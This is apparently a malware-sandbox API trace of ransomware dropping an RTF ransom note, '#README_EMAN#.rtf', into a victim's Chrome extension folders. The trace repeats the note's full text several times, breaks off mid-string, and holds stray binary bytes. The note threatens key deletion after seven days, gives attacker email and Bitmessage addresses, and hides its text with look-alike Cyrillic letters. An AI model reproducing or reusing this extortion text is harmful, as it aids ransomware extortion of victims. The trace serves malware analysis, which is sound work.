\\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.268] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.269] CloseHandle (hObject=0x2c8) returned 1 [0280.269] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0280.269] GetLastError () returned 0x2 [0280.269] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 